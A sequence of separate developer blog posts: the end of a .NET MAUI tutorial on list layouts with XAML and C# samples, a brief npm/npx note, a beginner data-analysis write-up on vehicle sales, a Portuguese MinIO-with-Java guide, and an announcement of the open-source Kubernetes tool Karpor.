FalseObject="#000000"/> ``` References: * [.NET MAUI Community Toolkit](https://learn.microsoft.com/dotnet/communitytoolkit/maui/) * [FontAwesome Icons](https://fontawesome.com) * [Lorem Picsum Photos](https://picsum.photos) * [Rating Control](https://www.nuget.org/packages/pankaj.util.RatingControl) ## Layout 4: Learning Course [Expand and Contract] {% embed https://youtu.be/RE_H8rV3by4 %} Those of you who know me are aware I enjoy language learning. One of the apps I've used called [TEUIDA](https://www.teuida.net) has a nice UI that presents courses in units and lessons. Tapping a unit expands to display the different lessons with chapters in a table of contents, roadmap fashion. Originally, I tried this with `CollectionView` and `ListView`, but this confirmed a bug in .NET MAUI on iOS where resizing at runtime doesn't trigger the rest of the list control to resize as you would expect. As of version 8.0.60, this works great on Android. As I evaluated the content to be displayed, I recognized I don't have a LOT of data. On each page of the app, I usually have four units, each with a variable number of chapters and lessons that never exceeds 10. For these reasons, I chose to use [`BindableLayout`](https://learn.microsoft.com/dotnet/maui/user-interface/layouts/bindablelayout?view=net-maui-8.0). In fact, this sample uses three nested `BindableLayout`. 😲 Did this become a problem? Nope. `BindableLayout` is a bit of an odd duck, and perhaps in retrospect it should have been a standalone control like the others. Instead it's an attached property that you can add to any other layout. So rather than starting with the control and specifying a layout like with `CollectionView`, you start with the layout you prefer and tag on the items source and data template. Simple enough. ```xml <ScrollView> <VerticalStackLayout Spacing="10" BindableLayout.ItemsSource="{Binding Items}"> <BindableLayout.ItemTemplate> <DataTemplate> <v:LearningUnitListItem /> </DataTemplate> </BindableLayout.ItemTemplate> </VerticalStackLayout> </ScrollView> ``` The `LearningUnitListItem` displays the primary box and a hidden list that is a loop over the chapters and lessons. To expand and contract the list of chapters and lessons, I'm simply using a click handler and toggling the visibility of the `VerticalStackLayout` that contains that content. References: * [BindableLayout](https://learn.microsoft.com/dotnet/maui/user-interface/layouts/bindablelayout?view=net-maui-8.0) ## Layout 5: Who's Watching [Flex layout] {% embed https://youtu.be/kt6TiI_Bko8 %} Inspired by Netflix, and Disney+, and "insert other streaming service," I made a "Who's Watching" sample. This one is very simple. It's a `FlexLayout` with `BindableLayout`. ```xml <FlexLayout Direction="Row" JustifyContent="Center" Wrap="Wrap" BindableLayout.ItemsSource="{Binding WhoIsWatching}" VerticalOptions="Center"> <BindableLayout.ItemTemplate> <DataTemplate x:DataType="m:Contact"> <VerticalStackLayout HorizontalOptions="Center" Spacing="8" FlexLayout.Basis="40%" FlexLayout.AlignSelf="Start"> <Image Source="{Binding ProfilePicture}" WidthRequest="80" HeightRequest="80" Aspect="AspectFill" BackgroundColor="Transparent"> <Image.Clip> <EllipseGeometry Center="40, 40" RadiusX="40" RadiusY="40" /> </Image.Clip> </Image> <Label Text="{Binding FirstName}" HorizontalOptions="Center" /> </VerticalStackLayout> </DataTemplate> </BindableLayout.ItemTemplate> </FlexLayout> ``` References: * [BindableLayout](https://learn.microsoft.com/dotnet/maui/user-interface/layouts/bindablelayout?view=net-maui-8.0) * [FlexLayout](https://learn.microsoft.com/dotnet/maui/user-interface/layouts/flexlayout?view=net-maui-8.0) ## Layout 6: Mailboxes [Expand and Contract] {% embed https://youtu.be/95Edxbryyws %} To reproduce the Mailboxes UI as seen in Mail on iOS, I chose `BindableLayout` and `Expander` from the .NET MAUI Community Toolkit. While a user could end up with a lot of mail accounts that would then benefit from some virtualization, it seems reasonable to start here and grow up into a `CollectionView` when necessary. Since I've covered the use of `BindableLayout` already, I'll focus now on the `Expander`. The control has two main parts, the header and the content. The header is always visible, and the content is what is shown/hidden based on the user interaction. In order to toggle the chevron indicator for open/closed, I started with two `Label` controls to display the font icons and used a relative source binding to watch the `IsExpanded` property of the parent control. Since I'm within the control, I can reference it this way rather than by name. I refactored this to a single `Label` and used the magnificent `BoolToObjectConverter`. How did I ever code without that?! ```xml <mct:Expander> <mct:Expander.Header> <Grid ColumnDefinitions="*,100,50" RowDefinitions="40"> <Label Text="Ortinau" Grid.Column="0" FontSize="Subtitle" VerticalOptions="Center" /> <Label Text="38386" Grid.Column="1" Style="{StaticResource SecondaryLabel}" HorizontalOptions="End" HorizontalTextAlignment="End" IsVisible="{Binding Path=IsExpanded, Source={RelativeSource AncestorType={x:Type mct:Expander}}, Converter={StaticResource InvertedBoolConverter}}" /> <Label Text="{Binding Path=IsExpanded, Source={RelativeSource AncestorType={x:Type mct:Expander}},Converter={StaticResource BoolToChevronConverter}}" FontSize="14" FontFamily="FluentUI" Style="{StaticResource SecondaryLabel}" TextColor="{StaticResource ActionColor}" Grid.Column="2" VerticalOptions="Center" HorizontalOptions="Center" /> </Grid> </mct:Expander.Header> <mct:Expander.Content> <Border> <VerticalStackLayout> <BindableLayout.ItemsSource> ... </BindableLayout.ItemsSource> <BindableLayout.ItemTemplate> <DataTemplate x:DataType="m:Mailbox"> <Grid ColumnDefinitions="60,*,100,50" RowDefinitions="40,1"> <Image Aspect="Center" HorizontalOptions="Center" VerticalOptions="Center"> <Image.Source> <FontImageSource Glyph="{Binding Icon}" FontFamily="FluentUI" Size="18" Color="{StaticResource ActionColor}" /> </Image.Source> </Image> <Label Text="{Binding Name}" Grid.Column="1" FontSize="14" VerticalOptions="Center" /> <Label Text="{Binding UnreadCount}" Grid.Column="2" Style="{StaticResource SecondaryLabel}" HorizontalOptions="End" HorizontalTextAlignment="End" /> <Label Text="{x:Static f:FluentUI.chevron_right_12_regular}" Grid.Column="3" Style="{StaticResource SecondaryLabel}" VerticalOptions="Center" FontSize="14" FontFamily="FluentUI" HorizontalOptions="Center" /> <BoxView Grid.ColumnSpan="4" Grid.Row="1" Margin="16,0,0,0" HeightRequest="1" Color="{AppThemeBinding Light=#f3f3f4, Dark=#333333}" /> </Grid> </DataTemplate> </BindableLayout.ItemTemplate> </VerticalStackLayout> </Border> </mct:Expander.Content> </mct:Expander> ``` References: * [BoolToObjectConverter](https://learn.microsoft.com/dotnet/communitytoolkit/maui/converters/bool-to-object-converter) * [BindableLayout](https://learn.microsoft.com/dotnet/maui/user-interface/layouts/bindablelayout?view=net-maui-8.0) * [Expander](https://learn.microsoft.com/dotnet/communitytoolkit/maui/views/expander) * [Relative bindings](https://learn.microsoft.com/dotnet/maui/fundamentals/data-binding/relative-bindings?view=net-maui-8.0) ## Layout 7: Contacts [Grouping, Search] {% embed https://youtu.be/R0KAUwHju9M %} Getting back into a sample with the need for virtualization, grouping, and search, I reproduced a Contacts list. ### Header My contact needed to appear at the top of the list and scroll away before the rest of the content. For that, I added a header to the `ListView`. Notice it does NOT take a `DataTemplate` since there can be only one of these and there's no need to instantiate it lazily. ```xml <ListView.Header> <HorizontalStackLayout Spacing="16" Padding="16"> <Border StrokeShape="RoundRectangle 40" StrokeThickness="0"> <Image Source="avatar_01.png" WidthRequest="80" HeightRequest="80" Aspect="AspectFill" VerticalOptions="Center" /> </Border> <Label Text="David Ortinau" FontSize="20" FontAttributes="Bold" VerticalOptions="Center" /> </HorizontalStackLayout> </ListView.Header> ``` ### Grouping Preparing your data sources to be grouped and searchable is the first step. In my approach, I get all my contacts in an ordered flat list, group them by the first initial of the last name, and then add them to a list of grouped contacts. The final piece is setting that aside to a new list that is unfiltered on which I can perform searches. ```csharp _contacts = MockDataService.GenerateContacts().OrderBy(c => c.LastName).ThenBy(c => c.FirstName).ToList(); ContactsGroups = new List<ContactsGroup>(); var groupedContacts = _contacts.GroupBy(c => c.LastName[0]).OrderBy(g => g.Key); foreach (var group in groupedContacts) { var contactsGroup = new ContactsGroup(group.Key.ToString(), group.ToList()); ContactsGroups.Add(contactsGroup); } _unfilteredContactsGroups = new List<ContactsGroup>(ContactsGroups); ``` To display the grouped list, I went with `ListView` primarily because this scenario is one of the fundamental scenarios it was made for. To group, I set `IsGroupingEnabled="True"` and provide a template for the group header. ```xml <ListView.GroupHeaderTemplate> <DataTemplate> <ViewCell> <Label Text="{Binding GroupName}" FontSize="18" FontAttributes="Bold" Padding="12,0,0,0" VerticalOptions="Center" Background="Transparent" /> </ViewCell> </DataTemplate> </ListView.GroupHeaderTemplate> ``` And just like that I have the basic grouped list. ### Search .NET MAUI provides a `SearchBar` control, so I added that above the `ListView` on the page. As the user types, the `SearchCommand` is executed. The `Text` property does default to a `TwoWay` binding, so I didn't need to specify that, but I wasn't sure until [reading the documentation](https://learn.microsoft.com/dotnet/maui/fundamentals/data-binding/binding-mode?view=net-maui-8.0#two-way-bindings) about binding modes for writing this post. ;) ```xml <SearchBar x:Name="SearchBar" Placeholder="Search" Text="{Binding SearchText, Mode=TwoWay}" SearchCommand="{Binding SearchCommand}" VerticalOptions="Start" BackgroundColor="{AppThemeBinding Light=White, Dark=Black}" /> ``` The search command filters down the unfiltered list and repopulates the `ContactsGroups` that is bound to the `ListView`. ```csharp [RelayCommand] void Search() { if (string.IsNullOrWhiteSpace(SearchText)) { // If the search text is empty, show all contacts ContactsGroups = _unfilteredContactsGroups; } else { // If the search text is not empty, show only contacts that contain the search text ContactsGroups = _unfilteredContactsGroups .Where(g => g.Any(c => c.FirstName.Contains(SearchText, StringComparison.InvariantCultureIgnoreCase) || c.LastName.Contains(SearchText, StringComparison.InvariantCultureIgnoreCase))) .ToList(); } } ``` BUT I was having a problem because I would type, and the list would filter, but I was also getting results I didn't expect. Why?! I explained my situation to Copilot, and it explained (as I suspected) that I was only searching on the group and not the contacts within the group as I expected. Copilot provided the solution. ```csharp ContactsGroups = _unfilteredContactsGroups .Select(g => new ContactsGroup(g.GroupName, g.Where(c => c.FirstName.Contains(SearchText, StringComparison.OrdinalIgnoreCase) || c.LastName.Contains(SearchText, StringComparison.OrdinalIgnoreCase)).ToList())) .Where(g => g.Any()) .ToList(); ``` References: * [ListView](https://learn.microsoft.com/dotnet/maui/user-interface/controls/listview?view=net-maui-8.0) * [ListView grouping](https://learn.microsoft.com/dotnet/maui/user-interface/controls/listview?view=net-maui-8.0#display-grouped-data) * [ListView header](https://learn.microsoft.com/dotnet/maui/user-interface/controls/listview?view=net-maui-8.0#headers-and-footers) * [RelayCommand](https://learn.microsoft.com/dotnet/communitytoolkit/mvvm/generators/relaycommand) * [SearchBar](https://learn.microsoft.com/dotnet/maui/user-interface/controls/searchbar?view=net-maui-8.0) ## Layout 8: Shopping [Header, Data template selector, infinite scroll] {% embed https://youtu.be/wALbd1Ae4dg %} Inspired by the [Adidas app](https://www.adidas.com/us/mobileapps), I had a bit of fun making this one. In addition to a header and making product images with ChatGPT, the display pattern is unique. You begin thinking it's going to be a grid layout with two columns, but then after four rows, you hit a product that spans both columns. Ok, so 4 and then 1, right? Wrong. From there on out it's 2 and 1. 🤯 Because I need to load data in batches as the user reaches the end of the list, I chose `CollectionView`, which has this feature built-in. ### Filter Header So the header is simple: a horizontal scrolling set of buttons to filter the list. ```xml <CollectionView.Header> <v:FilterView /> </CollectionView.Header> ``` `FilterView.xaml` ```xml <Grid ColumnDefinitions="Auto,*" ColumnSpacing="16" Margin="16,16,-16,16"> <Image HeightRequest="24" WidthRequest="24" Aspect="Center" Background="Transparent"> <Image.Source> <FontImageSource FontFamily="FontAwesome" Glyph="{x:Static f:FontAwesome.Filter}" Size="14" Color="{AppThemeBinding Light={StaticResource Gray900}, Dark={StaticResource Gray300}}"/> </Image.Source> </Image> <ScrollView Orientation="Horizontal" Grid.Column="1" HorizontalScrollBarVisibility="Never"> <HorizontalStackLayout Spacing="8"> <Button Text="705" Style="{StaticResource FilterButtonStyle}" /> <Button Text="SAMBA" Style="{StaticResource FilterButtonStyle}" /> <Button Text="GAZELLE" Style="{StaticResource FilterButtonStyle}" /> <Button Text="ULTRABOOST" Style="{StaticResource FilterButtonStyle}" /> <Button Text="ADIZERO" Style="{StaticResource FilterButtonStyle}" /> <Button Text="FORUM" Style="{StaticResource FilterButtonStyle}" /> <Button Text="SUPERSTAR" Style="{StaticResource FilterButtonStyle}" /> <Button Text="CAMPUS" Style="{StaticResource FilterButtonStyle}" /> <Button Text="LITE RACER" Style="{StaticResource FilterButtonStyle}" /> <Button Text="2000S" Style="{StaticResource FilterButtonStyle}" /> </HorizontalStackLayout> </ScrollView> </Grid> ``` Of course in a real app the buttons would be sourced from some collection and I would use a `BindableLayout` for them. ### Funky Layout Pattern How could I achieve this layout pattern? I chose to massage the data to represent how it would be displayed. That's what a ViewModel is for anyway. With more help from Copilot, I told it the pattern I needed to achieve and watched the code flow! I KNOW KUNG FU!!! ```csharp _productDisplays = new List<ProductDisplay>(); for (int i = 0; i < count; i++) { if (i < 4) { _productDisplays.Add(new ProductDisplay { Products = GenerateProducts().GetRange(i * 2, 2) }); } else if (i % 3 == 1) { _productDisplays.Add(new ProductDisplay { Products = GenerateProducts().GetRange(i * 2 - 1, 1) }); } else { _productDisplays.Add(new ProductDisplay { Products = GenerateProducts().GetRange(i * 2 - 2, 2) }); } ``` Seeing `GenerateProducts()` repeated may look like it's regenerating data over and over, but I'm actually returning the cached data set once it's populated. It doesn't read well, I admit. Now that I have the data representing the pattern I need of 4:1:2:1:2:1:2:1 etc., I can move on to the data template. The `CollectionView` implements a linear items layout by default, and that's just fine. Using a data template selector, I can have two templates based on how many items I need to display: Mono and Duo. ```csharp public class ShopTemplateSelector : DataTemplateSelector { public DataTemplate MonoTemplate { get; set; } public DataTemplate DuoTemplate { get; set; } public DataTemplate LoadingMoreTemplate { get; set; } protected override DataTemplate OnSelectTemplate(object item, BindableObject container) { ProductDisplay productDisplay = (ProductDisplay)item; if(productDisplay.IsLoading) { return LoadingMoreTemplate; } return ((ProductDisplay)item).Products.Count < 2 ? MonoTemplate : DuoTemplate; } } ``` The `DuoTemplate` is the more interesting one, as it just displays two `MonoTemplate`s side by side. ```xml <?xml version="1.0" encoding="utf-8" ?> <ContentView xmlns="http://schemas.microsoft.com/dotnet/2021/maui" xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml" xmlns:v="clr-namespace:AllTheLists.Views" xmlns:m="clr-namespace:AllTheLists.Models" x:DataType="m:ProductDisplay" x:Class="AllTheLists.Views.DuoProductListItem"> <Grid ColumnDefinitions="*,*" ColumnSpacing="4"> <v:MonoProductListItem Grid.Column="0" BindingContext="{Binding Products[0]}" /> <v:MonoProductListItem Grid.Column="1" BindingContext="{Binding Products[1]}" /> </Grid> </ContentView> ``` And just like that, I have the display I need, and I don't feel like it's overly complex. ### Infinite Scrolling As the user reaches near the end of the list, I need to start fetching more data and display an indicator to the user that this is happening. The indicator is meant to appear at the bottom of the list. The `CollectionView` has properties to help with the first part. `RemainingItemsThreshold` tells the control when that many items remain to be displayed, then call the event `RemainingItemsThresholdReached` and execute the command `RemainingItemsThresholdReachedCommand`. In my case, I use both of the latter, but you may only need the command. More on why I do this below. ```xml RemainingItemsThreshold="4" RemainingItemsThresholdReached="CollectionView_RemainingItemsThresholdReached" RemainingItemsThresholdReachedCommand="{Binding OnThresholdReachedCommand}" ``` The `OnThresholdReachedCommand` fetches more data and appends it to the end of the `ObservableCollection`. ```csharp [RelayCommand] async Task OnThresholdReached() { if(IsLoadingMore) return; IsLoadingMore = true; VisibleProducts.Add(new ProductDisplay { IsLoading = true }); await Task.Delay(4000); // fake a server call delay, allows the loading template to show VisibleProducts.Remove(VisibleProducts.Last()); var newProducts = Products.Skip(VisibleProducts.Count).Take(16); foreach (var product in newProducts) { VisibleProducts.Add(product); } await Task.Delay(200); // tiny delay for a ui refresh IsLoadingMore = false; } ``` The attentive reader will have noticed some code in the data template selector in from the previous section, which connects now with the command above. As soon as the call is made to get more data, create a blank `ProductDisplay` object which has one job, to tell the user `IsLoading=true`. In the data template selector, I opt to display this special template and add it to the bottom of the list. ```csharp if(productDisplay.IsLoading) { return LoadingMoreTemplate; } ``` As soon as my data arrives, I remove the last item from the collection and resume adding real data to be displayed. The `IsLoadingMore` boolean protects from calling this method while it's already in progress. Maybe there's a better way to do this, but old habits... To wrap this up, why am I also handling the event with `CollectionView_RemainingItemsThresholdReached`? It's to work around a bug on one of the platforms where the command is not being executed. ```csharp private void CollectionView_RemainingItemsThresholdReached(object sender, EventArgs e) { ((ProductDisplaysViewModel)BindingContext).ThresholdReachedCommand.Execute(null); } ``` ## Conclusion In conclusion, when choosing the right control for your app scenario, you have options! Consider your specific requirements and the level of customization you need for your list or layout. Prefer `CollectionView` over `ListView`, and don't ignore `BindableLayout`! As I was writing this, I kept seeing more things to add and try, such as editing and ordering a list. I suppose that's what tomorrow is for. All of my development here was done on .NET 9 previews using [VS Code Insiders](https://code.visualstudio.com/insiders/) and pre-release bits of the [.NET MAUI extension for VS Code](https://marketplace.visualstudio.com/items?itemName=ms-dotnettools.dotnet-maui) on a Macbook Pro M1. The addition of XAML IntelliSense and XAML/C# Hot Reload has been great. One final piece of advice I have to share is to consider all options when solving for a scenario. Choosing a control is only one element. Shaping your data is another. Adapting UX patterns is yet another. While technology may be inflexible and at times will work against you, rather than trying to brute force your way to success remember that you are flexible! I have found this to be a key to success no matter what language or technology I've used. I hope this has been a fun read and you have found a takeaway or two. Maybe you have a better way to do something, or you hate how I did it. Code can be a very personal thing. Whatever your reaction, be energized to go make something amazing to share with the world.
davidortinau
1,909,057
NPX vs NGX vs NPM
npx: an npm package runner Enter fullscreen mode Exit fullscreen mode ...
0
2024-07-02T15:03:49
https://dev.to/kiranuknow/npx-vs-ngx-3f7m
``` npx: an npm package runner ``` ``` ngx packages are used by Angular ngx : used by Angular to run Angular projects. ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/07g76yhhoxk7duhg6erf.png) NPM => Is a JS package manager. NPX => Is a tool for executing Node packages and execute npm package binaries. It is easy to remember: -npm stands for MANAGER -npx stands for EXECUTE
kiranuknow
1,909,056
FIRST GLANCE ANALYSIS
Hi guys, I have always wanted to write technical reports and share my knowledge in data analytics,...
0
2024-07-02T15:03:10
https://dev.to/benaj/first-glance-analysis-40k5
data, analytics, datacleaning, firstglance
Hi guys, I have always wanted to write technical reports and share my knowledge in data analytics, this is my first time and if I can, you can too! Today, I am going to be uncovering initial insights from a dataset at first glance. The data we are using contains 3 years of vehicle sales from 2003 - 2005. WOOAHHH! Long time ago, right? 😂 Well, that's the fun thing about data analytics, you get to go back in time. I LOVE IT and I am sure you can feel the thrill too. LET'S GOOOO!🤸‍♀️🚀 Data link below 👇 [Sale data link](https://docs.google.com/spreadsheets/d/1FgeHIjUj67rKU6XaDFXXKKmAf_Igc0UTds9ZaL8WY-o/edit?usp=sharing) Here comes the big question💡, without doing any deep analysis, what are the obvious patterns, trends, or anomalies in the data? I know , I know, data can seem overwhelming 😑, but don't worry, you've got this. Let's go!😋 Firstly, the headers are very important because they give us a description of the data we are looking at, with each variable having unique values that are relevant to understanding the full scope of the data. In this case, we can observe that some of the data headers are ambiguous which causes confusion on what the values are really describing. Example of such headers is MSRP. Secondly, Eagle-eyed observers would have seen the inconsistency of date, postal code and PHONE format, this can be troublesome when trying to perform deep analysis. Also, there are missing values for columns like postal code, state. Thirdly, we can perform simple calculations to find the year with the highest sales, trendy products or highest selling products, we can also find the most frequent/regular customer to award loyalty bonuses and the Country with the highest market potential or where most sales occur in order to streamline the company's target market. All these can be done using simple formulas. Finally, the following trends were uncovered by performing light analysis on the dataset, we can see a sudden upward surge in sales in 2004 followed by decrease in 2005 (all-time low). Also, we can observe that Classic cars are bought more often than other cars. {% codepen https://codepen.io/ben-aj/pen/xxNvLQN %} If we perform deeper analysis, start questioning our findings and finding out the WHYs, finding cause and trends that can help business decisions. It's so much like being a detective, a business Sherlock Holmes unlocking mysteries, and growing the revenue of this company, haha! 😁
benaj
1,780,887
Como Configurar e Integrar o MiniO com Java
O MiniO é uma solução de armazenamento compatível com S3, ideal para empresas que precisam armazenar...
0
2024-07-02T15:01:10
https://dev.to/adrianoaguiar/minio-com-spring-boot-32bl
O MiniO é uma solução de armazenamento compatível com S3, ideal para empresas que precisam armazenar dados internamente. Além de oferecer capacidade de armazenamento de arquivos, essa solução permite a criação de data lakes, sendo especialmente útil para profissionais que lidam com grandes volumes de dados. Neste artigo, vou demonstrar como configurar a integração com Java e realizar o envio de arquivos. Abordaremos os seguintes tópicos: - Vantagens de Usar o MiniO; - Levantando uma Imagem MiniO; - Tela de Acesso ao MiniO; - Configurando um Projeto em Java com MiniO; - Arquivo de Configuração; - Enviando Arquivos Usando o Postman; - Exemplo de Como Enviar um Arquivo para o MiniO; - Exemplo de Como Remover um Arquivo do MiniO; - Exemplo de Como Buscar um Arquivo pelo Nome no MiniO. Acompanhe o passo a passo detalhado para levantar uma imagem do MiniO, configurar seu projeto em Java e realizar o processo de envio de arquivos. **Qual a vantagem de usar** O MiniO é um servidor de armazenamento de objetos open-source e compatível com o S3 da Amazon, permitindo uma migração fácil para a Amazon. Além disso, está disponível para várias plataformas. Levantando uma Imagem MiniO: Vou explicar como iniciar uma imagem do MiniO no Docker e incluir as credenciais de acesso no arquivo docker-compose.yml. Abaixo está um exemplo: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/orfp052yxpx9etilq2wv.png) docker-compose up -d Para acessar localmente, basta informar a seguinte URL: http://localhost:9000/ E aqui está a tela de acesso: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/b4ejh4vyc3nzsswdwfc6.png) Configurando um projeto em java com Minio: Como estou utilizando Maven, vou mostrar como adicionar as dependências necessárias no arquivo pom.xml: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/393f76uskjywwfcxvakn.png) Agora, precisamos iniciar o MiniO. Para isso, vamos criar um arquivo de configuração da seguinte forma: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m7h67sqs38d3t09g8d2q.png) No entanto, precisamos definir as variáveis de ambiente com as informações necessárias para que o projeto consiga se conectar ao MiniO. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y5yi337e1s4hbudeiyar.png) Arquivo de configuração: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bcerwldt3jui6o1g3mkh.png) Abaixo está um exemplo de como enviar um arquivo para o MiniO utilizando o Postman: - Abra o Postman e selecione o método POST. - Insira a URL do seu servidor MiniO Vá até a aba "Body" e selecione "form-data". - Adicione um campo com o nome file e, no valor, selecione o arquivo que deseja enviar. - Clique em "Send" para enviar o arquivo. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9msngix9dctfd1jpa7v5.png) Abaixo está um exemplo de como enviar um arquivo para o MiniO utilizando Java: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3eu1zrghrzz1o3km4qpd.png) Abaixo está um exemplo de código em Java para remover um arquivo do MiniO: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/no08m2538wslvs4ao0lo.png) Abaixo está um exemplo de como buscar um arquivo pelo nome no MiniO utilizando Java: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cwcmu3hp01l3jl7gsbmu.png) **Conclusão** Neste artigo, exploramos como o MiniO pode ser uma solução eficiente para o armazenamento de dados, oferecendo compatibilidade com o Amazon S3 e sendo uma alternativa open-source robusta. Abordamos desde a configuração do MiniO e a integração com Java até exemplos práticos de envio e remoção de arquivos. O MiniO se destaca por sua facilidade de uso e flexibilidade, permitindo que empresas de todos os tamanhos implementem soluções de armazenamento escaláveis e seguras. Com a configuração correta e o uso das APIs, é possível integrar o MiniO a diversas aplicações, proporcionando uma experiência de armazenamento de objetos eficiente e acessível. No próximo artigo, abordaremos como utilizar o MiniO com multitenancy, permitindo que você gerencie vários inquilinos de forma isolada e segura. Fique atento para aprender mais sobre essa funcionalidade avançada e como ela pode beneficiar ainda mais sua infraestrutura de armazenamento. Repositório do Projeto: https://github.com/adrianoaguiardez/minio-spring Visite o MiniO - Site Oficial do MiniO: https://min.io Documentação - Documentação Oficial: Documentação do MiniO GitHub - Repositório Oficial: https://github.com/minio/minio
adrianoaguiar
1,909,050
i will develop new and advanced software
A post by Bealu Girma
0
2024-07-02T14:45:23
https://dev.to/bealu_girma_b6761abb446ff/i-will-develop-new-and-advanced-software-8bb
**_[](url)_**
bealu_girma_b6761abb446ff
1,908,726
🚀 Karpor Has Been Open-Sourced! We Build a Kubernetes Visualization Tool in the AI era
🔔 What is Karpor? Today we are excited to announce that Karpor is now open-source! 🎉🎉🎉...
27,936
2024-07-02T15:00:00
https://dev.to/elliotxx/karpor-has-been-open-sourced-we-build-a-kubernetes-visualization-tool-in-the-ai-era-18am
kubernetes, opensource, cloudnative, ai
## 🔔 What is Karpor? Today we are excited to announce that Karpor is now open-source! 🎉🎉🎉 Karpor is a **Modern Kubernetes Visualization Tool**. Its core features focus on **🔍 Search, 📊 Insight and ✨ AI**. The goal is to connect platforms and multi-clusters more easily and quickly, and use AI to empower Kubernetes to extract key insights from proliferations of cluster resources and provide them to end users. Karpor is designed to reduce the complexity to use Kubernetes, so that developers and platform teams can extract the most valuable information more effectively and intuitively. **Github**: [https://github.com/KusionStack/karpor](https://github.com/KusionStack/karpor) ![image.png](https://miro.medium.com/v2/0*tQEAHm6KOxZn5lLT.png) ## 🚀 Why Karpor? The increasing complexity of the Kubernetes ecosystem is an undeniable trend that is becoming more and more difficult to manage. This complexity not only entails a heavier burden on operations and maintenance but also slows down the adoption of new technologies by users, limiting their ability to fully leverage the potential of Kubernetes. ![image](https://miro.medium.com/v2/resize:fit:1400/format:webp/0*MGHG6nCjUTFaTdTK) As an experienced _Kubernetes YAML Engineer_, you may have also encountered the following perplexities: - The cluster is like a black box, sometimes all you can see is a KubeConfig, and we can't see what happens behind it - The team/company has a specific business domain model and needs to establish a mapping between existing systems and Kubernetes resources - The application has been deployed to multiple Kubernetes clusters, but its topology is not fully visible We have used several Kubernetes visualization tools over time, such as Lens, k9s, kube-explorer, and the kubernetes dashboard, among others. Some are commercialized, some do not support self-host, and some are rudimentary for production needs... In short, We have not yet encountered a product that completely satisfied with. The recent rise of large language models has sparked an unprecedented wave of artificial intelligence innovations. This time, AI technology has remarkly infiltrated its way into people's everyday life. Even my retired parents has started using AI services, which makes me believe that we are at a historical moment that is reshaping the world. So naturally we started building a lightweight, AI-empowered Kubernetes visualization tool to solve the problems mentioned earlier. It features the following: - Fully empowers Kubernetes with **AI**. - **Identify** **potential risks** and provide **solutions based on AI**. - **Intuitive and effective search**, providing a number of user-friendly ways to locate resources across clusters, such as keywords, SQL, and natural language. - **Customized logical views** to fit the resource organization models for different scenarios, such as applications, environments, etc, which may have different interpretations at places. - **Travel back in time** via timeline, time machine to quickly diagnose and **troubleshoot** based on historical snapshots. - **Cross-cluster topological views**, providing a global perspective of resources no matter where they are. - **Low cognitive burden**, it is read-only, non-invasive to the cluster it's watching, and users can deploy it to their private environments with one click. We have named this tool Karpor. In general, we wish Karpor to focus on 🔍 search, 📊 insights, and ✨ AI, to break through the increasingly complex maze of Kubernetes, achieving the following value proposition: ![image.png](https://miro.medium.com/v2/resize:fit:1400/format:webp/0*mGj5TBnkW2ntSAXG.png) As of today, we have built the initial version of Karpor based on this vision, which features the following: - An optimized **search experience** for Kubernetes: ![image.png](https://miro.medium.com/v2/0*gxvK8D7RorBzGqA-.png) - Discover potential problems through **compliance reports**: ![image.png](https://miro.medium.com/v2/resize:fit:1400/format:webp/0*BSuWWBq01CbJuVcU.png) - Manage the **customized logical views**: ![image.png](https://miro.medium.com/v2/resize:fit:1400/format:webp/0*4uFnPDPRy8x7o2DL.png) ![image.png](https://miro.medium.com/v2/resize:fit:1400/format:webp/0*UFeMV4EfuLbZF-dA.png) ## 🙌 Karpor vs. Kubernetes Dashboard In today's Kubernetes ecosystem, there are multiple tools and platforms that can manage and visualize clusters. Kubernetes Dashboard is an officially provided universal web UI for managing and troubleshooting Kubernetes clusters. Karpor, as an emerging Kubernetes Visualization Tool, is designed to provide more advanced features and a better user experience. Here are some key comparisons between Karpor and Kubernetes Dashboard: ![image.png](https://miro.medium.com/v2/resize:fit:1400/format:webp/0*P0qkIpE_AalUkwPd.png) ## 🎖 ️Vision: Embracing the Community We firmly believe that a successful open-source project should be community-driven. For open-source projects, we come up with an idea and build an initial version. The final form of the project, we believe, should be well guided by the community. Therefore, we are committed to shaping Karpor into something that is: - **Small and beautiful**: Focused on an excellence of user experience. - **Vendor-neutral**: Independent from any specific cloud services or companies. - **Developer-friendly**: Community-friendly with high-quality documentations and support. - **Community-driven**: Encouraging and welcoming contributors to participate in and even lead the development of the project. We place great emphasis on community participation and contribution. To this end, we have specially put together a community task list to help those that are interested quickly get started and participate in the project. The tasks are categorized by difficulty, ranging from simple tasks such as document translation, bug fixes, and unit testing, to medium-difficulty tasks like log/event aggregators, risk audit enhancements, and automatic cluster imports, to challenging tasks such as OpenCost integration and login authentication. We encourage every developer interested in Karpor to visit our GitHub page, review the task list, and contribute at ease. 🎖︎ Community Task List: [https://github.com/KusionStack/karpor/issues/463](https://github.com/KusionStack/karpor/issues/463) All developers who participate in the community will be featured in the Contributors section on the README and the homepage of the official website. We extend our sincerest thanks to all developers and contributors who are already active in the Karpor open-source project, for your efforts and creativity! We look forward to working with the community to make Karpor an even more powerful and comprehensive open-source tool. ![image.png](https://miro.medium.com/v2/resize:fit:1400/format:webp/0*tEvJY0WIXbkrLIIF.png) ## 🌈 Moving Forward We are actively soliciting feedback and suggestions from the community to plan the next version of Karpor — v0.5. We want to hear your voice, whether it's feature requests, improvement suggestions, or bug reports; please leave a comment in the corresponding issue. Our **ultimate goal is to shape Karpor into a community-driven Kubernetes Visualization Tool in the AI era**. Currently, what we have is a usable version with basic functionalities. In the next version, we will solidify the basic functionalities and fully embrace AI. We have preliminarily planned some new features, such as support for natural language search of cluster resources, AI-driven diagnostic suggestions, timelines, etc., to help users better understand resources in multiple clusters, identify issues, and troubleshoot. We welcome everyone's feedback! **If you like this project, welcome to Star on GitHub 🌟🌟🌟** [https://github.com/KusionStack/karpor](https://github.com/KusionStack/karpor)
elliotxx
